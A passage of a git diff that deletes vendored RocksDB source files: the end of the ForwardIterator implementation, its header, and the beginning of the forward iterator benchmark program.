-            // prev_ is not set yet
-            is_prev_set_ == false ||
-            // We are doing SeekToFirst() and internal_key.size() = 0
-            seek_to_first ||
-            // prev_key_ > internal_key
-            cfd_->internal_comparator().InternalKeyComparator::Compare(
-                prev_key_.GetInternalKey(), internal_key) > 0)) {
-      // Some iterators are trimmed. Need to rebuild.
-      RebuildIterators(true);
-      // Already seeked mutable iter, so seek again
-      seek_to_first ? mutable_iter_->SeekToFirst()
-                    : mutable_iter_->Seek(internal_key);
-    }
-    {
-      auto tmp = MinIterHeap(MinIterComparator(&cfd_->internal_comparator()));
-      immutable_min_heap_.swap(tmp);
-    }
-    for (size_t i = 0; i < imm_iters_.size(); i++) {
-      auto* m = imm_iters_[i];
-      seek_to_first ? m->SeekToFirst() : m->Seek(internal_key);
-      if (!m->status().ok()) {
-        immutable_status_ = m->status();
-      } else if (m->Valid()) {
-        immutable_min_heap_.push(m);
-      }
-    }
-
-    Slice user_key;
-    if (!seek_to_first) {
-      user_key = ExtractUserKey(internal_key);
-    }
-    const VersionStorageInfo* vstorage = sv_->current->storage_info();
-    const std::vector<FileMetaData*>& l0 = vstorage->LevelFiles(0);
-    for (size_t i = 0; i < l0.size(); ++i) {
-      if (!l0_iters_[i]) {
-        continue;
-      }
-      if (seek_to_first) {
-        l0_iters_[i]->SeekToFirst();
-      } else {
-        // If the target key passes over the larget key, we are sure Next()
-        // won't go over this file.
-        if (user_comparator_->Compare(user_key,
-              l0[i]->largest.user_key()) > 0) {
-          if (read_options_.iterate_upper_bound != nullptr) {
-            has_iter_trimmed_for_upper_bound_ = true;
-            DeleteIterator(l0_iters_[i]);
-            l0_iters_[i] = nullptr;
-          }
-          continue;
-        }
-        l0_iters_[i]->Seek(internal_key);
-      }
-
-      if (!l0_iters_[i]->status().ok()) {
-        immutable_status_ = l0_iters_[i]->status();
-      } else if (l0_iters_[i]->Valid()) {
-        if (!IsOverUpperBound(l0_iters_[i]->key())) {
-          immutable_min_heap_.push(l0_iters_[i]);
-        } else {
-          has_iter_trimmed_for_upper_bound_ = true;
-          DeleteIterator(l0_iters_[i]);
-          l0_iters_[i] = nullptr;
-        }
-      }
-    }
-
-    for (int32_t level = 1; level < vstorage->num_levels(); ++level) {
-      const std::vector<FileMetaData*>& level_files =
-          vstorage->LevelFiles(level);
-      if (level_files.empty()) {
-        continue;
-      }
-      if (level_iters_[level - 1] == nullptr) {
-        continue;
-      }
-      uint32_t f_idx = 0;
-      if (!seek_to_first) {
-        f_idx = FindFileInRange(level_files, internal_key, 0,
-                                static_cast<uint32_t>(level_files.size()));
-      }
-
-      // Seek
-      if (f_idx < level_files.size()) {
-        level_iters_[level - 1]->SetFileIndex(f_idx);
-        seek_to_first ? level_iters_[level - 1]->SeekToFirst() :
-                        level_iters_[level - 1]->Seek(internal_key);
-
-        if (!level_iters_[level - 1]->status().ok()) {
-          immutable_status_ = level_iters_[level - 1]->status();
-        } else if (level_iters_[level - 1]->Valid()) {
-          if (!IsOverUpperBound(level_iters_[level - 1]->key())) {
-            immutable_min_heap_.push(level_iters_[level - 1]);
-          } else {
-            // Nothing in this level is interesting. Remove.
-            has_iter_trimmed_for_upper_bound_ = true;
-            DeleteIterator(level_iters_[level - 1]);
-            level_iters_[level - 1] = nullptr;
-          }
-        }
-      }
-    }
-
-    if (seek_to_first) {
-      is_prev_set_ = false;
-    } else {
-      prev_key_.SetInternalKey(internal_key);
-      is_prev_set_ = true;
-      is_prev_inclusive_ = true;
-    }
-
-    TEST_SYNC_POINT_CALLBACK("ForwardIterator::SeekInternal:Immutable", this);
-  } else if (current_ && current_ != mutable_iter_) {
-    // current_ is one of immutable iterators, push it back to the heap
-    immutable_min_heap_.push(current_);
-  }
-
-  UpdateCurrent();
-  TEST_SYNC_POINT_CALLBACK("ForwardIterator::SeekInternal:Return", this);
-}
-
-void ForwardIterator::Next() {
-  assert(valid_);
-  bool update_prev_key = false;
-
-  if (sv_ == nullptr ||
-      sv_->version_number != cfd_->GetSuperVersionNumber()) {
-    std::string current_key = key().ToString();
-    Slice old_key(current_key.data(), current_key.size());
-
-    if (sv_ == nullptr) {
-      RebuildIterators(true);
-    } else {
-      RenewIterators();
-    }
-    SeekInternal(old_key, false);
-    if (!valid_ || key().compare(old_key) != 0) {
-      return;
-    }
-  } else if (current_ != mutable_iter_) {
-    // It is going to advance immutable iterator
-
-    if (is_prev_set_ && prefix_extractor_) {
-      // advance prev_key_ to current_ only if they share the same prefix
-      update_prev_key =
-          prefix_extractor_->Transform(prev_key_.GetUserKey())
-              .compare(prefix_extractor_->Transform(current_->key())) == 0;
-    } else {
-      update_prev_key = true;
-    }
-
-
-    if (update_prev_key) {
-      prev_key_.SetInternalKey(current_->key());
-      is_prev_set_ = true;
-      is_prev_inclusive_ = false;
-    }
-  }
-
-  current_->Next();
-  if (current_ != mutable_iter_) {
-    if (!current_->status().ok()) {
-      immutable_status_ = current_->status();
-    } else if ((current_->Valid()) && (!IsOverUpperBound(current_->key()))) {
-      immutable_min_heap_.push(current_);
-    } else {
-      if ((current_->Valid()) && (IsOverUpperBound(current_->key()))) {
-        // remove the current iterator
-        DeleteCurrentIter();
-        current_ = nullptr;
-      }
-      if (update_prev_key) {
-        mutable_iter_->Seek(prev_key_.GetInternalKey());
-      }
-    }
-  }
-  UpdateCurrent();
-  TEST_SYNC_POINT_CALLBACK("ForwardIterator::Next:Return", this);
-}
-
-Slice ForwardIterator::key() const {
-  assert(valid_);
-  return current_->key();
-}
-
-Slice ForwardIterator::value() const {
-  assert(valid_);
-  return current_->value();
-}
-
-Status ForwardIterator::status() const {
-  if (!status_.ok()) {
-    return status_;
-  } else if (!mutable_iter_->status().ok()) {
-    return mutable_iter_->status();
-  }
-
-  return immutable_status_;
-}
-
-Status ForwardIterator::GetProperty(std::string prop_name, std::string* prop) {
-  assert(prop != nullptr);
-  if (prop_name == "rocksdb.iterator.super-version-number") {
-    *prop = ToString(sv_->version_number);
-    return Status::OK();
-  }
-  return Status::InvalidArgument();
-}
-
-void ForwardIterator::SetPinnedItersMgr(
-    PinnedIteratorsManager* pinned_iters_mgr) {
-  pinned_iters_mgr_ = pinned_iters_mgr;
-  UpdateChildrenPinnedItersMgr();
-}
-
-void ForwardIterator::UpdateChildrenPinnedItersMgr() {
-  // Set PinnedIteratorsManager for mutable memtable iterator.
-  if (mutable_iter_) {
-    mutable_iter_->SetPinnedItersMgr(pinned_iters_mgr_);
-  }
-
-  // Set PinnedIteratorsManager for immutable memtable iterators.
-  for (InternalIterator* child_iter : imm_iters_) {
-    if (child_iter) {
-      child_iter->SetPinnedItersMgr(pinned_iters_mgr_);
-    }
-  }
-
-  // Set PinnedIteratorsManager for L0 files iterators.
-  for (InternalIterator* child_iter : l0_iters_) {
-    if (child_iter) {
-      child_iter->SetPinnedItersMgr(pinned_iters_mgr_);
-    }
-  }
-
-  // Set PinnedIteratorsManager for L1+ levels iterators.
-  for (LevelIterator* child_iter : level_iters_) {
-    if (child_iter) {
-      child_iter->SetPinnedItersMgr(pinned_iters_mgr_);
-    }
-  }
-}
-
-bool ForwardIterator::IsKeyPinned() const {
-  return pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled() &&
-         current_->IsKeyPinned();
-}
-
-bool ForwardIterator::IsValuePinned() const {
-  return pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled() &&
-         current_->IsValuePinned();
-}
-
-void ForwardIterator::RebuildIterators(bool refresh_sv) {
-  // Clean up
-  Cleanup(refresh_sv);
-  if (refresh_sv) {
-    // New
-    sv_ = cfd_->GetReferencedSuperVersion(&(db_->mutex_));
-  }
-  RangeDelAggregator range_del_agg(
-      InternalKeyComparator(cfd_->internal_comparator()), {} /* snapshots */);
-  mutable_iter_ = sv_->mem->NewIterator(read_options_, &arena_);
-  sv_->imm->AddIterators(read_options_, &imm_iters_, &arena_);
-  if (!read_options_.ignore_range_deletions) {
-    std::unique_ptr<InternalIterator> range_del_iter(
-        sv_->mem->NewRangeTombstoneIterator(read_options_));
-    range_del_agg.AddTombstones(std::move(range_del_iter));
-    sv_->imm->AddRangeTombstoneIterators(read_options_, &arena_,
-                                         &range_del_agg);
-  }
-  has_iter_trimmed_for_upper_bound_ = false;
-
-  const auto* vstorage = sv_->current->storage_info();
-  const auto& l0_files = vstorage->LevelFiles(0);
-  l0_iters_.reserve(l0_files.size());
-  for (const auto* l0 : l0_files) {
-    if ((read_options_.iterate_upper_bound != nullptr) &&
-        cfd_->internal_comparator().user_comparator()->Compare(
-            l0->smallest.user_key(), *read_options_.iterate_upper_bound) > 0) {
-      has_iter_trimmed_for_upper_bound_ = true;
-      l0_iters_.push_back(nullptr);
-      continue;
-    }
-    l0_iters_.push_back(cfd_->table_cache()->NewIterator(
-        read_options_, *cfd_->soptions(), cfd_->internal_comparator(), l0->fd,
-        read_options_.ignore_range_deletions ? nullptr : &range_del_agg));
-  }
-  BuildLevelIterators(vstorage);
-  current_ = nullptr;
-  is_prev_set_ = false;
-
-  UpdateChildrenPinnedItersMgr();
-  if (!range_del_agg.IsEmpty()) {
-    status_ = Status::NotSupported(
-        "Range tombstones unsupported with ForwardIterator");
-    valid_ = false;
-  }
-}
-
-void ForwardIterator::RenewIterators() {
-  SuperVersion* svnew;
-  assert(sv_);
-  svnew = cfd_->GetReferencedSuperVersion(&(db_->mutex_));
-
-  if (mutable_iter_ != nullptr) {
-    DeleteIterator(mutable_iter_, true /* is_arena */);
-  }
-  for (auto* m : imm_iters_) {
-    DeleteIterator(m, true /* is_arena */);
-  }
-  imm_iters_.clear();
-
-  mutable_iter_ = svnew->mem->NewIterator(read_options_, &arena_);
-  svnew->imm->AddIterators(read_options_, &imm_iters_, &arena_);
-  RangeDelAggregator range_del_agg(
-      InternalKeyComparator(cfd_->internal_comparator()), {} /* snapshots */);
-  if (!read_options_.ignore_range_deletions) {
-    std::unique_ptr<InternalIterator> range_del_iter(
-        svnew->mem->NewRangeTombstoneIterator(read_options_));
-    range_del_agg.AddTombstones(std::move(range_del_iter));
-    sv_->imm->AddRangeTombstoneIterators(read_options_, &arena_,
-                                         &range_del_agg);
-  }
-
-  const auto* vstorage = sv_->current->storage_info();
-  const auto& l0_files = vstorage->LevelFiles(0);
-  const auto* vstorage_new = svnew->current->storage_info();
-  const auto& l0_files_new = vstorage_new->LevelFiles(0);
-  size_t iold, inew;
-  bool found;
-  std::vector<InternalIterator*> l0_iters_new;
-  l0_iters_new.reserve(l0_files_new.size());
-
-  for (inew = 0; inew < l0_files_new.size(); inew++) {
-    found = false;
-    for (iold = 0; iold < l0_files.size(); iold++) {
-      if (l0_files[iold] == l0_files_new[inew]) {
-        found = true;
-        break;
-      }
-    }
-    if (found) {
-      if (l0_iters_[iold] == nullptr) {
-        l0_iters_new.push_back(nullptr);
-        TEST_SYNC_POINT_CALLBACK("ForwardIterator::RenewIterators:Null", this);
-      } else {
-        l0_iters_new.push_back(l0_iters_[iold]);
-        l0_iters_[iold] = nullptr;
-        TEST_SYNC_POINT_CALLBACK("ForwardIterator::RenewIterators:Copy", this);
-      }
-      continue;
-    }
-    l0_iters_new.push_back(cfd_->table_cache()->NewIterator(
-        read_options_, *cfd_->soptions(), cfd_->internal_comparator(),
-        l0_files_new[inew]->fd,
-        read_options_.ignore_range_deletions ? nullptr : &range_del_agg));
-  }
-
-  for (auto* f : l0_iters_) {
-    DeleteIterator(f);
-  }
-  l0_iters_.clear();
-  l0_iters_ = l0_iters_new;
-
-  for (auto* l : level_iters_) {
-    DeleteIterator(l);
-  }
-  level_iters_.clear();
-  BuildLevelIterators(vstorage_new);
-  current_ = nullptr;
-  is_prev_set_ = false;
-  SVCleanup();
-  sv_ = svnew;
-
-  UpdateChildrenPinnedItersMgr();
-  if (!range_del_agg.IsEmpty()) {
-    status_ = Status::NotSupported(
-        "Range tombstones unsupported with ForwardIterator");
-    valid_ = false;
-  }
-}
-
-void ForwardIterator::BuildLevelIterators(const VersionStorageInfo* vstorage) {
-  level_iters_.reserve(vstorage->num_levels() - 1);
-  for (int32_t level = 1; level < vstorage->num_levels(); ++level) {
-    const auto& level_files = vstorage->LevelFiles(level);
-    if ((level_files.empty()) ||
-        ((read_options_.iterate_upper_bound != nullptr) &&
-         (user_comparator_->Compare(*read_options_.iterate_upper_bound,
-                                    level_files[0]->smallest.user_key()) <
-          0))) {
-      level_iters_.push_back(nullptr);
-      if (!level_files.empty()) {
-        has_iter_trimmed_for_upper_bound_ = true;
-      }
-    } else {
-      level_iters_.push_back(
-          new LevelIterator(cfd_, read_options_, level_files));
-    }
-  }
-}
-
-void ForwardIterator::ResetIncompleteIterators() {
-  const auto& l0_files = sv_->current->storage_info()->LevelFiles(0);
-  for (size_t i = 0; i < l0_iters_.size(); ++i) {
-    assert(i < l0_files.size());
-    if (!l0_iters_[i] || !l0_iters_[i]->status().IsIncomplete()) {
-      continue;
-    }
-    DeleteIterator(l0_iters_[i]);
-    l0_iters_[i] = cfd_->table_cache()->NewIterator(
-        read_options_, *cfd_->soptions(), cfd_->internal_comparator(),
-        l0_files[i]->fd, nullptr /* range_del_agg */);
-    l0_iters_[i]->SetPinnedItersMgr(pinned_iters_mgr_);
-  }
-
-  for (auto* level_iter : level_iters_) {
-    if (level_iter && level_iter->status().IsIncomplete()) {
-      level_iter->Reset();
-    }
-  }
-
-  current_ = nullptr;
-  is_prev_set_ = false;
-}
-
-void ForwardIterator::UpdateCurrent() {
-  if (immutable_min_heap_.empty() && !mutable_iter_->Valid()) {
-    current_ = nullptr;
-  } else if (immutable_min_heap_.empty()) {
-    current_ = mutable_iter_;
-  } else if (!mutable_iter_->Valid()) {
-    current_ = immutable_min_heap_.top();
-    immutable_min_heap_.pop();
-  } else {
-    current_ = immutable_min_heap_.top();
-    assert(current_ != nullptr);
-    assert(current_->Valid());
-    int cmp = cfd_->internal_comparator().InternalKeyComparator::Compare(
-        mutable_iter_->key(), current_->key());
-    assert(cmp != 0);
-    if (cmp > 0) {
-      immutable_min_heap_.pop();
-    } else {
-      current_ = mutable_iter_;
-    }
-  }
-  valid_ = (current_ != nullptr);
-  if (!status_.ok()) {
-    status_ = Status::OK();
-  }
-
-  // Upper bound doesn't apply to the memtable iterator. We want Valid() to
-  // return false when all iterators are over iterate_upper_bound, but can't
-  // just set valid_ to false, as that would effectively disable the tailing
-  // optimization (Seek() would be called on all immutable iterators regardless
-  // of whether the target key is greater than prev_key_).
-  current_over_upper_bound_ = valid_ && IsOverUpperBound(current_->key());
-}
-
-bool ForwardIterator::NeedToSeekImmutable(const Slice& target) {
-  // We maintain the interval (prev_key_, immutable_min_heap_.top()->key())
-  // such that there are no records with keys within that range in
-  // immutable_min_heap_. Since immutable structures (SST files and immutable
-  // memtables) can't change in this version, we don't need to do a seek if
-  // 'target' belongs to that interval (immutable_min_heap_.top() is already
-  // at the correct position).
-
-  if (!valid_ || !current_ || !is_prev_set_ || !immutable_status_.ok()) {
-    return true;
-  }
-  Slice prev_key = prev_key_.GetInternalKey();
-  if (prefix_extractor_ && prefix_extractor_->Transform(target).compare(
-    prefix_extractor_->Transform(prev_key)) != 0) {
-    return true;
-  }
-  if (cfd_->internal_comparator().InternalKeyComparator::Compare(
-        prev_key, target) >= (is_prev_inclusive_ ? 1 : 0)) {
-    return true;
-  }
-
-  if (immutable_min_heap_.empty() && current_ == mutable_iter_) {
-    // Nothing to seek on.
-    return false;
-  }
-  if (cfd_->internal_comparator().InternalKeyComparator::Compare(
-        target, current_ == mutable_iter_ ? immutable_min_heap_.top()->key()
-                                          : current_->key()) > 0) {
-    return true;
-  }
-  return false;
-}
-
-void ForwardIterator::DeleteCurrentIter() {
-  const VersionStorageInfo* vstorage = sv_->current->storage_info();
-  const std::vector<FileMetaData*>& l0 = vstorage->LevelFiles(0);
-  for (size_t i = 0; i < l0.size(); ++i) {
-    if (!l0_iters_[i]) {
-      continue;
-    }
-    if (l0_iters_[i] == current_) {
-      has_iter_trimmed_for_upper_bound_ = true;
-      DeleteIterator(l0_iters_[i]);
-      l0_iters_[i] = nullptr;
-      return;
-    }
-  }
-
-  for (int32_t level = 1; level < vstorage->num_levels(); ++level) {
-    if (level_iters_[level - 1] == nullptr) {
-      continue;
-    }
-    if (level_iters_[level - 1] == current_) {
-      has_iter_trimmed_for_upper_bound_ = true;
-      DeleteIterator(level_iters_[level - 1]);
-      level_iters_[level - 1] = nullptr;
-    }
-  }
-}
-
-bool ForwardIterator::TEST_CheckDeletedIters(int* pdeleted_iters,
-                                             int* pnum_iters) {
-  bool retval = false;
-  int deleted_iters = 0;
-  int num_iters = 0;
-
-  const VersionStorageInfo* vstorage = sv_->current->storage_info();
-  const std::vector<FileMetaData*>& l0 = vstorage->LevelFiles(0);
-  for (size_t i = 0; i < l0.size(); ++i) {
-    if (!l0_iters_[i]) {
-      retval = true;
-      deleted_iters++;
-    } else {
-      num_iters++;
-    }
-  }
-
-  for (int32_t level = 1; level < vstorage->num_levels(); ++level) {
-    if ((level_iters_[level - 1] == nullptr) &&
-        (!vstorage->LevelFiles(level).empty())) {
-      retval = true;
-      deleted_iters++;
-    } else if (!vstorage->LevelFiles(level).empty()) {
-      num_iters++;
-    }
-  }
-  if ((!retval) && num_iters <= 1) {
-    retval = true;
-  }
-  if (pdeleted_iters) {
-    *pdeleted_iters = deleted_iters;
-  }
-  if (pnum_iters) {
-    *pnum_iters = num_iters;
-  }
-  return retval;
-}
-
-uint32_t ForwardIterator::FindFileInRange(
-    const std::vector<FileMetaData*>& files, const Slice& internal_key,
-    uint32_t left, uint32_t right) {
-  while (left < right) {
-    uint32_t mid = (left + right) / 2;
-    const FileMetaData* f = files[mid];
-    if (cfd_->internal_comparator().InternalKeyComparator::Compare(
-          f->largest.Encode(), internal_key) < 0) {
-      // Key at "mid.largest" is < "target".  Therefore all
-      // files at or before "mid" are uninteresting.
-      left = mid + 1;
-    } else {
-      // Key at "mid.largest" is >= "target".  Therefore all files
-      // after "mid" are uninteresting.
-      right = mid;
-    }
-  }
-  return right;
-}
-
-void ForwardIterator::DeleteIterator(InternalIterator* iter, bool is_arena) {
-  if (iter == nullptr) {
-    return;
-  }
-
-  if (pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled()) {
-    pinned_iters_mgr_->PinIterator(iter, is_arena);
-  } else {
-    if (is_arena) {
-      iter->~InternalIterator();
-    } else {
-      delete iter;
-    }
-  }
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/forward_iterator.h b/thirdparty/rocksdb/db/forward_iterator.h
deleted file mode 100644
index d4f32cb..0000000
--- a/thirdparty/rocksdb/db/forward_iterator.h
+++ /dev/null
@@ -1,153 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include <vector>
-#include <queue>
-
-#include "rocksdb/db.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/options.h"
-#include "db/dbformat.h"
-#include "table/internal_iterator.h"
-#include "util/arena.h"
-
-namespace rocksdb {
-
-class DBImpl;
-class Env;
-struct SuperVersion;
-class ColumnFamilyData;
-class LevelIterator;
-class VersionStorageInfo;
-struct FileMetaData;
-
-class MinIterComparator {
- public:
-  explicit MinIterComparator(const Comparator* comparator) :
-    comparator_(comparator) {}
-
-  bool operator()(InternalIterator* a, InternalIterator* b) {
-    return comparator_->Compare(a->key(), b->key()) > 0;
-  }
- private:
-  const Comparator* comparator_;
-};
-
-typedef std::priority_queue<InternalIterator*, std::vector<InternalIterator*>,
-                            MinIterComparator> MinIterHeap;
-
-/**
- * ForwardIterator is a special type of iterator that only supports Seek()
- * and Next(). It is expected to perform better than TailingIterator by
- * removing the encapsulation and making all information accessible within
- * the iterator. At the current implementation, snapshot is taken at the
- * time Seek() is called. The Next() followed do not see new values after.
- */
-class ForwardIterator : public InternalIterator {
- public:
-  ForwardIterator(DBImpl* db, const ReadOptions& read_options,
-                  ColumnFamilyData* cfd, SuperVersion* current_sv = nullptr);
-  virtual ~ForwardIterator();
-
-  void SeekForPrev(const Slice& target) override {
-    status_ = Status::NotSupported("ForwardIterator::SeekForPrev()");
-    valid_ = false;
-  }
-  void SeekToLast() override {
-    status_ = Status::NotSupported("ForwardIterator::SeekToLast()");
-    valid_ = false;
-  }
-  void Prev() override {
-    status_ = Status::NotSupported("ForwardIterator::Prev");
-    valid_ = false;
-  }
-
-  virtual bool Valid() const override;
-  void SeekToFirst() override;
-  virtual void Seek(const Slice& target) override;
-  virtual void Next() override;
-  virtual Slice key() const override;
-  virtual Slice value() const override;
-  virtual Status status() const override;
-  virtual Status GetProperty(std::string prop_name, std::string* prop) override;
-  virtual void SetPinnedItersMgr(
-      PinnedIteratorsManager* pinned_iters_mgr) override;
-  virtual bool IsKeyPinned() const override;
-  virtual bool IsValuePinned() const override;
-
-  bool TEST_CheckDeletedIters(int* deleted_iters, int* num_iters);
-
- private:
-  void Cleanup(bool release_sv);
-  void SVCleanup();
-  void RebuildIterators(bool refresh_sv);
-  void RenewIterators();
-  void BuildLevelIterators(const VersionStorageInfo* vstorage);
-  void ResetIncompleteIterators();
-  void SeekInternal(const Slice& internal_key, bool seek_to_first);
-  void UpdateCurrent();
-  bool NeedToSeekImmutable(const Slice& internal_key);
-  void DeleteCurrentIter();
-  uint32_t FindFileInRange(
-    const std::vector<FileMetaData*>& files, const Slice& internal_key,
-    uint32_t left, uint32_t right);
-
-  bool IsOverUpperBound(const Slice& internal_key) const;
-
-  // Set PinnedIteratorsManager for all children Iterators, this function should
-  // be called whenever we update children Iterators or pinned_iters_mgr_.
-  void UpdateChildrenPinnedItersMgr();
-
-  // A helper function that will release iter in the proper manner, or pass it
-  // to pinned_iters_mgr_ to release it later if pinning is enabled.
-  void DeleteIterator(InternalIterator* iter, bool is_arena = false);
-
-  DBImpl* const db_;
-  const ReadOptions read_options_;
-  ColumnFamilyData* const cfd_;
-  const SliceTransform* const prefix_extractor_;
-  const Comparator* user_comparator_;
-  MinIterHeap immutable_min_heap_;
-
-  SuperVersion* sv_;
-  InternalIterator* mutable_iter_;
-  std::vector<InternalIterator*> imm_iters_;
-  std::vector<InternalIterator*> l0_iters_;
-  std::vector<LevelIterator*> level_iters_;
-  InternalIterator* current_;
-  bool valid_;
-
-  // Internal iterator status; set only by one of the unsupported methods.
-  Status status_;
-  // Status of immutable iterators, maintained here to avoid iterating over
-  // all of them in status().
-  Status immutable_status_;
-  // Indicates that at least one of the immutable iterators pointed to a key
-  // larger than iterate_upper_bound and was therefore destroyed. Seek() may
-  // need to rebuild such iterators.
-  bool has_iter_trimmed_for_upper_bound_;
-  // Is current key larger than iterate_upper_bound? If so, makes Valid()
-  // return false.
-  bool current_over_upper_bound_;
-
-  // Left endpoint of the range of keys that immutable iterators currently
-  // cover. When Seek() is called with a key that's within that range, immutable
-  // iterators don't need to be moved; see NeedToSeekImmutable(). This key is
-  // included in the range after a Seek(), but excluded when advancing the
-  // iterator using Next().
-  IterKey prev_key_;
-  bool is_prev_set_;
-  bool is_prev_inclusive_;
-
-  PinnedIteratorsManager* pinned_iters_mgr_;
-  Arena arena_;
-};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/forward_iterator_bench.cc b/thirdparty/rocksdb/db/forward_iterator_bench.cc
deleted file mode 100644
index e9ae770..0000000
--- a/thirdparty/rocksdb/db/forward_iterator_bench.cc
+++ /dev/null
@@ -1,375 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#if !defined(GFLAGS) || defined(ROCKSDB_LITE)
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-  return 1;
-}
-#elif defined(OS_MACOSX) || defined(OS_WIN)
-// Block forward_iterator_bench under MAC and Windows
-int main() { return 0; }
-#else
-#include <gflags/gflags.h>
-#include <semaphore.h>
-#include <atomic>
-#include <bitset>
-#include <chrono>
-#include <climits>
-#include <condition_variable>
-#include <limits>
-#include <mutex>
-#include <queue>
-#include <random>
-#include <thread>
-
-#include "rocksdb/cache.h"
-#include "rocksdb/db.h"
-#include "rocksdb/status.h"
-#include "rocksdb/table.h"
-#include "port/port.h"
-#include "util/testharness.h"
-
-const int MAX_SHARDS = 100000;
-
-DEFINE_int32(writers, 8, "");
-DEFINE_int32(readers, 8, "");
-DEFINE_int64(rate, 100000, "");
-DEFINE_int64(value_size, 300, "");
-DEFINE_int64(shards, 1000, "");
-DEFINE_int64(memtable_size, 500000000, "");
-DEFINE_int64(block_cache_size, 300000000, "");
-DEFINE_int64(block_size, 65536, "");
-DEFINE_double(runtime, 300.0, "");
-DEFINE_bool(cache_only_first, true, "");
-DEFINE_bool(iterate_upper_bound, true, "");
-
-struct Stats {
-  char pad1[128] __attribute__((__unused__));
-  std::atomic<uint64_t> written{0};
-  char pad2[128] __attribute__((__unused__));
-  std::atomic<uint64_t> read{0};
-  std::atomic<uint64_t> cache_misses{0};
-  char pad3[128] __attribute__((__unused__));
-} stats;
-
-struct Key {
-  Key() {}
-  Key(uint64_t shard_in, uint64_t seqno_in)
-      : shard_be(htobe64(shard_in)), seqno_be(htobe64(seqno_in)) {}
-
-  uint64_t shard() const { return be64toh(shard_be); }
-  uint64_t seqno() const { return be64toh(seqno_be); }
-
- private:
-  uint64_t shard_be;
-  uint64_t seqno_be;
-} __attribute__((__packed__));
-
-struct Reader;
-struct Writer;
-
-struct ShardState {
-  char pad1[128] __attribute__((__unused__));
-  std::atomic<uint64_t> last_written{0};
-  Writer* writer;
-  Reader* reader;
-  char pad2[128] __attribute__((__unused__));
-  std::atomic<uint64_t> last_read{0};
-  std::unique_ptr<rocksdb::Iterator> it;
-  std::unique_ptr<rocksdb::Iterator> it_cacheonly;
-  Key upper_bound;
-  rocksdb::Slice upper_bound_slice;
-  char pad3[128] __attribute__((__unused__));
-};
-
-struct Reader {
- public:
-  explicit Reader(std::vector<ShardState>* shard_states, rocksdb::DB* db)
-      : shard_states_(shard_states), db_(db) {
-    sem_init(&sem_, 0, 0);
-    thread_ = port::Thread(&Reader::run, this);
-  }
-
-  void run() {
-    while (1) {
-      sem_wait(&sem_);
-      if (done_.load()) {
-        break;
-      }
-
-      uint64_t shard;
-      {
-        std::lock_guard<std::mutex> guard(queue_mutex_);
-        assert(!shards_pending_queue_.empty());
-        shard = shards_pending_queue_.front();
-        shards_pending_queue_.pop();
-        shards_pending_set_.reset(shard);
-      }
-      readOnceFromShard(shard);
-    }
-  }
-
-  void readOnceFromShard(uint64_t shard) {
-    ShardState& state = (*shard_states_)[shard];
-    if (!state.it) {
-      // Initialize iterators
-      rocksdb::ReadOptions options;
-      options.tailing = true;
-      if (FLAGS_iterate_upper_bound) {
-        state.upper_bound = Key(shard, std::numeric_limits<uint64_t>::max());
-        state.upper_bound_slice = rocksdb::Slice(
-            (const char*)&state.upper_bound, sizeof(state.upper_bound));
-        options.iterate_upper_bound = &state.upper_bound_slice;
-      }
-
-      state.it.reset(db_->NewIterator(options));
-
-      if (FLAGS_cache_only_first) {
-        options.read_tier = rocksdb::ReadTier::kBlockCacheTier;
-        state.it_cacheonly.reset(db_->NewIterator(options));
-      }
-    }
-
-    const uint64_t upto = state.last_written.load();
-    for (rocksdb::Iterator* it : {state.it_cacheonly.get(), state.it.get()}) {
-      if (it == nullptr) {
-        continue;
-      }
-      if (state.last_read.load() >= upto) {
-        break;
-      }
-      bool need_seek = true;
-      for (uint64_t seq = state.last_read.load() + 1; seq <= upto; ++seq) {
-        if (need_seek) {
-          Key from(shard, state.last_read.load() + 1);
-          it->Seek(rocksdb::Slice((const char*)&from, sizeof(from)));
-          need_seek = false;
-        } else {
-          it->Next();
-        }
-        if (it->status().IsIncomplete()) {
-          ++::stats.cache_misses;
-          break;
-        }
-        assert(it->Valid());
-        assert(it->key().size() == sizeof(Key));
-        Key key;
-        memcpy(&key, it->key().data(), it->key().size());
-        // fprintf(stderr, "Expecting (%ld, %ld) read (%ld, %ld)\n",
-        //         shard, seq, key.shard(), key.seqno());
-        assert(key.shard() == shard);
-        assert(key.seqno() == seq);
-        state.last_read.store(seq);
-        ++::stats.read;
-      }
-    }
-  }
-
-  void onWrite(uint64_t shard) {
-    {
-      std::lock_guard<std::mutex> guard(queue_mutex_);
-      if (!shards_pending_set_.test(shard)) {
-        shards_pending_queue_.push(shard);
-        shards_pending_set_.set(shard);
-        sem_post(&sem_);
-      }
-    }
-  }
-
-  ~Reader() {
-    done_.store(true);
-    sem_post(&sem_);
-    thread_.join();
-  }
-
- private:
-  char pad1[128] __attribute__((__unused__));
-  std::vector<ShardState>* shard_states_;
-  rocksdb::DB* db_;
-  rocksdb::port::Thread thread_;
-  sem_t sem_;
-  std::mutex queue_mutex_;
-  std::bitset<MAX_SHARDS + 1> shards_pending_set_;
-  std::queue<uint64_t> shards_pending_queue_;
-  std::atomic<bool> done_{false};
-  char pad2[128] __attribute__((__unused__));
-};
-
-struct Writer {
-  explicit Writer(std::vector<ShardState>* shard_states, rocksdb::DB* db)
-      : shard_states_(shard_states), db_(db) {}
-
-  void start() { thread_ = port::Thread(&Writer::run, this); }
-
-  void run() {
-    std::queue<std::chrono::steady_clock::time_point> workq;
-    std::chrono::steady_clock::time_point deadline(
-        std::chrono::steady_clock::now() +
